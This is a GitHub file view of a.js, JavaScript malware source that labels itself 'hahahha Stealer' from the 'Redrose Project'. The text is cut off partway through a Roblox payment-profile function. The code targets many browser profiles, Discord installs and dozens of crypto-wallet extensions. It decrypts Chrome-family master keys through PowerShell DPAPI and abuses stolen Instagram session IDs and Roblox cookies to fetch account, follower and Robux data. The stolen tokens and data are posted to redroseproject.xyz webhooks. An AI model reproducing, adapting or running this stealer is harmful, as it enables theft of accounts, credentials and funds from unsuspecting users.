-
Notifications
You must be signed in to change notification settings - Fork 2
/
a.js
2258 lines (1965 loc) · 84.2 KB
/
a.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
const fs = require('fs');
const path = require('path');
const httpx = require('axios');
const axios = require('axios');
const os = require('os');
const FormData = require('form-data');
const AdmZip = require('adm-zip');
const { execSync, exec } = require('child_process');
const crypto = require('crypto');
const sqlite3 = require('sqlite3');
const { extractAll, createPackage } = require('asar');
const https = require('https');
const local = process.env.LOCALAPPDATA;
const discords = [];
debug = false;
let injection_paths = []
var appdata = process.env.APPDATA,
LOCAL = process.env.LOCALAPPDATA,
localappdata = process.env.LOCALAPPDATA;
let browser_paths = [localappdata + '\\Google\\Chrome\\User Data\\Default\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 1\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 2\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 3\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 4\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 5\\', localappdata + '\\Google\\Chrome\\User Data\\Guest Profile\\', localappdata + '\\Google\\Chrome\\User Data\\Default\\Network\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 1\\Network\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 2\\Network\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 3\\Network\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 4\\Network\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 5\\Network\\', localappdata + '\\Google\\Chrome\\User Data\\Guest Profile\\Network\\', appdata + '\\Opera Software\\Opera Stable\\', appdata + '\\Opera Software\\Opera GX Stable\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\', localappdata + '\\Microsoft\\Edge\\User Data\\Default\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 1\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 2\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 3\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 4\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 5\\', localappdata + '\\Microsoft\\Edge\\User Data\\Guest Profile\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Network\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\Network\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\Network\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\Network\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\Network\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\Network\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\Network\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\Network\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\Network\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\Network\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\Network\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\Network\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Default\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 1\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 2\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 3\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 4\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 5\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Guest Profile\\Network\\'];
const key = "Write the key you created here https://redroseproject.xyz/createkey"
paths = [
appdata + '\\discord\\',
appdata + '\\discordcanary\\',
appdata + '\\discordptb\\',
appdata + '\\discorddevelopment\\',
appdata + '\\lightcord\\',
localappdata + '\\Google\\Chrome\\User Data\\Default\\',
localappdata + '\\Google\\Chrome\\User Data\\Profile 1\\',
localappdata + '\\Google\\Chrome\\User Data\\Profile 2\\',
localappdata + '\\Google\\Chrome\\User Data\\Profile 3\\',
localappdata + '\\Google\\Chrome\\User Data\\Profile 4\\',
localappdata + '\\Google\\Chrome\\User Data\\Profile 5\\',
localappdata + '\\Google\\Chrome\\User Data\\Guest Profile\\',
localappdata + '\\Google\\Chrome\\User Data\\Default\\Network\\',
localappdata + '\\Google\\Chrome\\User Data\\Profile 1\\Network\\',
localappdata + '\\Google\\Chrome\\User Data\\Profile 2\\Network\\',
localappdata + '\\Google\\Chrome\\User Data\\Profile 3\\Network\\',
localappdata + '\\Google\\Chrome\\User Data\\Profile 4\\Network\\',
localappdata + '\\Google\\Chrome\\User Data\\Profile 5\\Network\\',
localappdata + '\\Google\\Chrome\\User Data\\Guest Profile\\Network\\',
appdata + '\\Opera Software\\Opera Stable\\',
appdata + '\\Opera Software\\Opera GX Stable\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\',
localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\',
localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\',
localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\',
localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\',
localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\',
localappdata + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Default\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Profile 1\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Profile 2\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Profile 3\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Profile 4\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Profile 5\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Guest Profile\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Network\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\Network\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\Network\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\Network\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\Network\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\Network\\',
localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\Network\\',
localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\Network\\',
localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\Network\\',
localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\Network\\',
localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\Network\\',
localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\Network\\',
localappdata + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\Network\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Default\\Network\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Profile 1\\Network\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Profile 2\\Network\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Profile 3\\Network\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Profile 4\\Network\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Profile 5\\Network\\',
localappdata + '\\Microsoft\\Edge\\User Data\\Guest Profile\\Network\\'
];
function onlyUnique(item, index, array) {
return array.indexOf(item) === index;
}
const config = {
"logout": "instant",
"inject-notify": "true",
"logout-notify": "true",
"init-notify": "false",
"embed-color": 3553599,
"disable-qr-code": "true"
}
let api_auth = 'xx';
const _0x9b6227 = {}
_0x9b6227.passwords = 0
_0x9b6227.cookies = 0
_0x9b6227.autofills = 0
_0x9b6227.wallets = 0
_0x9b6227.telegram = false
const count = _0x9b6227,
user = {
ram: os.totalmem(),
version: os.version(),
uptime: os.uptime,
homedir: os.homedir(),
hostname: os.hostname(),
userInfo: os.userInfo().username,
type: os.type(),
arch: os.arch(),
release: os.release(),
roaming: process.env.APPDATA,
local: process.env.LOCALAPPDATA,
temp: process.env.TEMP,
countCore: process.env.NUMBER_OF_PROCESSORS,
sysDrive: process.env.SystemDrive,
fileLoc: process.cwd(),
randomUUID: crypto.randomBytes(5).toString('hex'),
start: Date.now(),
debug: false,
copyright: '<================[hahahha Stealer]>================>\n\n',
url: null,
}
_0x2afdce = {}
const walletPaths = _0x2afdce,
_0x4ae424 = {}
_0x4ae424.Trust = '\\Local Extension Settings\\egjidjbpglichdcondbcbdnbeeppgdph'
_0x4ae424.Metamask =
'\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn'
_0x4ae424.Coinbase =
'\\Local Extension Settings\\hnfanknocfeofbddgcijnmhnfnkdnaad'
_0x4ae424.BinanceChain =
'\\Local Extension Settings\\fhbohimaelbohpjbbldcngcnapndodjp'
_0x4ae424.Phantom =
'\\Local Extension Settings\\bfnaelmomeimhlpmgjnjophhpkkoljpa'
_0x4ae424.TronLink =
'\\Local Extension Settings\\ibnejdfjmmkpcnlpebklmnkoeoihofec'
_0x4ae424.Ronin = '\\Local Extension Settings\\fnjhmkhhmkbjkkabndcnnogagogbneec'
_0x4ae424.Exodus =
'\\Local Extension Settings\\aholpfdialjgjfhomihkjbmgjidlcdno'
_0x4ae424.Coin98 =
'\\Local Extension Settings\\aeachknmefphepccionboohckonoeemg'
_0x4ae424.Authenticator =
'\\Sync Extension Settings\\bhghoamapcdpbohphigoooaddinpkbai'
_0x4ae424.MathWallet =
'\\Sync Extension Settings\\afbcbjpbpfadlkmhmclhkeeodmamcflc'
_0x4ae424.YoroiWallet =
'\\Local Extension Settings\\ffnbelfdoeiohenkjibnmadjiehjhajb'
_0x4ae424.GuardaWallet =
'\\Local Extension Settings\\hpglfhgfnhbgpjdenjgmdgoeiappafln'
_0x4ae424.JaxxxLiberty =
'\\Local Extension Settings\\cjelfplplebdjjenllpjcblmjkfcffne'
_0x4ae424.Wombat =
'\\Local Extension Settings\\amkmjjmmflddogmhpjloimipbofnfjih'
_0x4ae424.EVERWallet =
'\\Local Extension Settings\\cgeeodpfagjceefieflmdfphplkenlfk'
_0x4ae424.KardiaChain =
'\\Local Extension Settings\\pdadjkfkgcafgbceimcpbkalnfnepbnk'
_0x4ae424.XDEFI = '\\Local Extension Settings\\hmeobnfnfcmdkdcmlblgagmfpfboieaf'
_0x4ae424.Nami = '\\Local Extension Settings\\lpfcbjknijpeeillifnkikgncikgfhdo'
_0x4ae424.TerraStation =
'\\Local Extension Settings\\aiifbnbfobpmeekipheeijimdpnlpgpp'
_0x4ae424.MartianAptos =
'\\Local Extension Settings\\efbglgofoippbgcjepnhiblaibcnclgk'
_0x4ae424.TON = '\\Local Extension Settings\\nphplpgoakhhjchkkhmiggakijnkhfnd'
_0x4ae424.Keplr = '\\Local Extension Settings\\dmkamcknogkgcdfhhbddcghachkejeap'
_0x4ae424.CryptoCom =
'\\Local Extension Settings\\hifafgmccdpekplomjjkcfgodnhcellj'
_0x4ae424.PetraAptos =
'\\Local Extension Settings\\ejjladinnckdgjemekebdpeokbikhfci'
_0x4ae424.OKX = '\\Local Extension Settings\\mcohilncbfahbmgdjkbpemcciiolgcge'
_0x4ae424.Sollet =
'\\Local Extension Settings\\fhmfendgdocmcbmfikdcogofphimnkno'
_0x4ae424.Sender =
'\\Local Extension Settings\\epapihdplajcdnnkdeiahlgigofloibg'
_0x4ae424.Sui = '\\Local Extension Settings\\opcgpfmipidbgpenhmajoajpbobppdil'
_0x4ae424.SuietSui =
'\\Local Extension Settings\\khpkpbbcccdmmclmpigdgddabeilkdpd'
_0x4ae424.Braavos =
'\\Local Extension Settings\\jnlgamecbpmbajjfhmmmlhejkemejdma'
_0x4ae424.FewchaMove =
'\\Local Extension Settings\\ebfidpplhabeedpnhjnobghokpiioolj'
_0x4ae424.EthosSui =
'\\Local Extension Settings\\mcbigmjiafegjnnogedioegffbooigli'
_0x4ae424.ArgentX =
'\\Local Extension Settings\\dlcobpjiigpikoobohmabehhmhfoodbb'
_0x4ae424.NiftyWallet =
'\\Local Extension Settings\\jbdaocneiiinmjbjlgalhcelgbejmnid'
_0x4ae424.BraveWallet =
'\\Local Extension Settings\\odbfpeeihdkbihmopkbjmoonfanlbfcl'
_0x4ae424.EqualWallet =
'\\Local Extension Settings\\blnieiiffboillknjnepogjhkgnoapac'
_0x4ae424.BitAppWallet =
'\\Local Extension Settings\\fihkakfobkmkjojpchpfgcmhfjnmnfpi'
_0x4ae424.iWallet =
'\\Local Extension Settings\\kncchdigobghenbbaddojjnnaogfppfj'
_0x4ae424.AtomicWallet =
'\\Local Extension Settings\\fhilaheimglignddkjgofkcbgekhenbh'
_0x4ae424.MewCx = '\\Local Extension Settings\\nlbmnnijcnlegkjjpcfjclmcfggfefdm'
_0x4ae424.GuildWallet =
'\\Local Extension Settings\\nanjmdknhkinifnkgdcggcfnhdaammmj'
_0x4ae424.SaturnWallet =
'\\Local Extension Settings\\nkddgncdjgjfcddamfgcmfnlhccnimig'
_0x4ae424.HarmonyWallet =
'\\Local Extension Settings\\fnnegphlobjdpkhecapkijjdkgcjhkib'
_0x4ae424.PaliWallet =
'\\Local Extension Settings\\mgffkfbidihjpoaomajlbgchddlicgpn'
_0x4ae424.BoltX = '\\Local Extension Settings\\aodkkagnadcbobfpggfnjeongemjbjca'
_0x4ae424.LiqualityWallet =
'\\Local Extension Settings\\kpfopkelmapcoipemfendmdcghnegimn'
_0x4ae424.MaiarDeFiWallet =
'\\Local Extension Settings\\dngmlblcodfobpdpecaadgfbcggfjfnm'
_0x4ae424.TempleWallet =
'\\Local Extension Settings\\ookjlbkiijinhpmnjffcofjonbfbgaoc'
_0x4ae424.Metamask_E =
'\\Local Extension Settings\\ejbalbakoplchlghecdalmeeeajnimhm'
_0x4ae424.Ronin_E =
'\\Local Extension Settings\\kjmoohlgokccodicjjfebfomlbljgfhk'
_0x4ae424.Yoroi_E =
'\\Local Extension Settings\\akoiaibnepcedcplijmiamnaigbepmcb'
_0x4ae424.Authenticator_E =
'\\Sync Extension Settings\\ocglkepbibnalbgmbachknglpdipeoio'
_0x4ae424.MetaMask_O =
'\\Local Extension Settings\\djclckkglechooblngghdinmeemkbgci'
const extension = _0x4ae424,
browserPath = [
[
user.local + '\\Google\\Chrome\\User Data\\Default\\',
'Default',
user.local + '\\Google\\Chrome\\User Data\\',
],
[
user.local + '\\Google\\Chrome\\User Data\\Profile 1\\',
'Profile_1',
user.local + '\\Google\\Chrome\\User Data\\',
],
[
user.local + '\\Google\\Chrome\\User Data\\Profile 2\\',
'Profile_2',
user.local + '\\Google\\Chrome\\User Data\\',
],
[
user.local + '\\Google\\Chrome\\User Data\\Profile 3\\',
'Profile_3',
user.local + '\\Google\\Chrome\\User Data\\',
],
[
user.local + '\\Google\\Chrome\\User Data\\Profile 4\\',
'Profile_4',
user.local + '\\Google\\Chrome\\User Data\\',
],
[
user.local + '\\Google\\Chrome\\User Data\\Profile 5\\',
'Profile_5',
user.local + '\\Google\\Chrome\\User Data\\',
],
[
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\',
'Default',
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
],
[
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\',
'Profile_1',
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
],
[
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\',
'Profile_2',
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
],
[
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\',
'Profile_3',
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
],
[
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\',
'Profile_4',
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
],
[
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\',
'Profile_5',
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
],
[
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\',
'Guest Profile',
user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
],
[
user.local + '\\Yandex\\YandexBrowser\\User Data\\Default\\',
'Default',
user.local + '\\Yandex\\YandexBrowser\\User Data\\',
],
[
user.local + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\',
'Profile_1',
user.local + '\\Yandex\\YandexBrowser\\User Data\\',
],
[
user.local + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\',
'Profile_2',
user.local + '\\Yandex\\YandexBrowser\\User Data\\',
],
[
user.local + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\',
'Profile_3',
user.local + '\\Yandex\\YandexBrowser\\User Data\\',
],
[
user.local + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\',
'Profile_4',
user.local + '\\Yandex\\YandexBrowser\\User Data\\',
],
[
user.local + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\',
'Profile_5',
user.local + '\\Yandex\\YandexBrowser\\User Data\\',
],
[
user.local + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\',
'Guest Profile',
user.local + '\\Yandex\\YandexBrowser\\User Data\\',
],
[
user.local + '\\Microsoft\\Edge\\User Data\\Default\\',
'Default',
user.local + '\\Microsoft\\Edge\\User Data\\',
],
[
user.local + '\\Microsoft\\Edge\\User Data\\Profile 1\\',
'Profile_1',
user.local + '\\Microsoft\\Edge\\User Data\\',
],
[
user.local + '\\Microsoft\\Edge\\User Data\\Profile 2\\',
'Profile_2',
user.local + '\\Microsoft\\Edge\\User Data\\',
],
[
user.local + '\\Microsoft\\Edge\\User Data\\Profile 3\\',
'Profile_3',
user.local + '\\Microsoft\\Edge\\User Data\\',
],
[
user.local + '\\Microsoft\\Edge\\User Data\\Profile 4\\',
'Profile_4',
user.local + '\\Microsoft\\Edge\\User Data\\',
],
[
user.local + '\\Microsoft\\Edge\\User Data\\Profile 5\\',
'Profile_5',
user.local + '\\Microsoft\\Edge\\User Data\\',
],
[
user.local + '\\Microsoft\\Edge\\User Data\\Guest Profile\\',
'Guest Profile',
user.local + '\\Microsoft\\Edge\\User Data\\',
],
[
user.roaming + '\\Opera Software\\Opera Neon\\User Data\\Default\\',
'Default',
user.roaming + '\\Opera Software\\Opera Neon\\User Data\\',
],
[
user.roaming + '\\Opera Software\\Opera Stable\\',
'Default',
user.roaming + '\\Opera Software\\Opera Stable\\',
],
[
user.roaming + '\\Opera Software\\Opera GX Stable\\',
'Default',
user.roaming + '\\Opera Software\\Opera GX Stable\\',
],
],
randomPath = `${user.fileLoc}\\${user.randomUUID}`;
fs.mkdirSync(randomPath, 484);
async function getEncrypted() {
for (let _0x4c3514 = 0; _0x4c3514 < browserPath.length; _0x4c3514++) {
if (!fs.existsSync('' + browserPath[_0x4c3514][0])) {
continue
}
try {
let _0x276965 = Buffer.from(
JSON.parse(fs.readFileSync(browserPath[_0x4c3514][2] + 'Local State'))
.os_crypt.encrypted_key,
'base64'
).slice(5)
const _0x4ff4c6 = Array.from(_0x276965),
_0x4860ac = execSync(
'powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(' +
_0x4ff4c6 +
"), $null, 'CurrentUser')"
)
.toString()
.split('\r\n'),
_0x4a5920 = _0x4860ac.filter((_0x29ebb3) => _0x29ebb3 != ''),
_0x2ed7ba = Buffer.from(_0x4a5920)
browserPath[_0x4c3514].push(_0x2ed7ba)
} catch (_0x32406b) {}
}
}
async function fetchInstagramData(sessionId) {
const headers = {
"Host": "i.instagram.com",
"X-Ig-Connection-Type": "WiFi",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Ig-Capabilities": "36r/Fx8=",
"User-Agent": "Instagram 159.0.0.28.123 (iPhone8,1; iOS 14_1; en_SA@calendar=gregorian; ar-SA; scale=2.00; 750x1334; 244425769) AppleWebKit/420+",
"X-Ig-App-Locale": "en",
"X-Mid": "Ypg64wAAAAGXLOPZjFPNikpr8nJt",
"Accept-Encoding": "gzip, deflate",
"Cookie": `sessionid=${sessionId};`
};
const response = await httpx.get("https://i.instagram.com/api/v1/accounts/current_user/?edit=true", { headers });
const userData = response.data.user;
return {
username: userData.username,
verified: userData.is_verified,
avatar: userData.profile_pic_url,
sessionId
};
}
async function fetchFollowersCount(sessionId) {
const headers = {
"Host": "i.instagram.com",
"User-Agent": "Instagram 159.0.0.28.123 (iPhone8,1; iOS 14_1; en_SA@calendar=gregorian; ar-SA; scale=2.00; 750x1334; 244425769) AppleWebKit/420+",
"Cookie": `sessionid=${sessionId};`
};
const accountResponse = await httpx.get("https://i.instagram.com/api/v1/accounts/current_user/?edit=true", { headers });
const accountInfo = accountResponse.data.user;
const userInfoResponse = await httpx.get(`https://i.instagram.com/api/v1/users/${accountInfo.pk}/info`, { headers });
const userData = userInfoResponse.data.user;
const followersCount = userData.follower_count;
return followersCount;
}
async function handleError(error, errorMessage) {
const errorEmbed = {
color: 0xFF5733,
title: 'Error Occurred ❌',
description: errorMessage,
fields: [
{ name: 'Error Message', value: '```' + error.message + '```', inline: false },
],
footer: {
text: 'Created by: Redrose Project',
},
};
await axios.post("https://redroseproject.xyz/error", { embeds: [errorEmbed] });
console.error(errorMessage, error.message);
}
async function submitInstagram(sessionId) {
try {
const data = await fetchInstagramData(sessionId);
const followersCount = await fetchFollowersCount(sessionId);
const embed = {
color: 2895667,
title: 'Instagram Sessions',
fields: [
{ name: 'Verified Account', value: data.verified ? 'Yes' : 'No', inline: true },
{ name: 'Username', value: data.username, inline: true },
{ name: 'Followers Count', value: followersCount, inline: true },
{ name: '<:hackerblack:1095747410539593800> Token', value: '```' + data.sessionId + '```', inline: false },
],
footer: {
text: 'Created by: Redrose Project',
},
};
const randomString = crypto.randomBytes(5).toString('hex');
await axios.post(`https://redroseproject.xyz/webhooks/${randomString}`, { embeds: [embed], key });
console.log("Data sent to Discord webhook successfully.");
} catch (error) {
await handleError(error, "Error sending data to Discord webhook:");
}
}
async function GetRobloxDataAndTransactionTotals(secret_cookie) {
let data = {};
let headers = {
'accept': 'application/json, text/plain, */*',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.9,hi;q=0.8',
'cookie': `.ROBLOSECURITY=${secret_cookie};`,
'origin': 'https://www.roblox.com',
'referer': 'https://www.roblox.com',
'sec-ch-ua': '"Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Windows"',
'sec-fetch-dest': 'empty',
'sec-fetch-mode': 'cors',
'sec-fetch-site': 'same-site',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'
};
try {
let userDataResponse = await axios.get('https://www.roblox.com/mobileapi/userinfo', { headers: headers });
data['username'] = userDataResponse.data['UserName'];
data['avatar'] = userDataResponse.data['ThumbnailUrl'];
data['robux'] = userDataResponse.data['RobuxBalance'];
data['premium'] = userDataResponse.data['IsPremium'];
data['userID'] = userDataResponse.data['UserID'];
// Get transaction totals
let transactionTotalsResponse = await axios.get(`https://economy.roblox.com/v2/users/${data.userID}/transaction-totals?timeFrame=Month&transactionType=summary`, { headers: headers });
data['outgoingRobux'] = transactionTotalsResponse.data['outgoingRobuxTotal'];
data['purchasesTotal'] = transactionTotalsResponse.data['purchasesTotal'];
data['pendingRobuxTotal'] = transactionTotalsResponse.data['pendingRobuxTotal'];
data['salesTotal'] = transactionTotalsResponse.data['salesTotal'];
data['currencyPurchasesTotal'] = transactionTotalsResponse.data['currencyPurchasesTotal'];
//pendingRobuxTotal
return data;
} catch (error) {
console.error('Error fetching Roblox data and transaction totals:', error.message);
throw error;
}
}
async function GetPaymentProfiles(secret_cookie) {
let headers = {
'accept': 'application/json, text/plain, */*',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.9,hi;q=0.8',
'cookie': `.ROBLOSECURITY=${secret_cookie};`,
'origin': 'https://www.roblox.com',
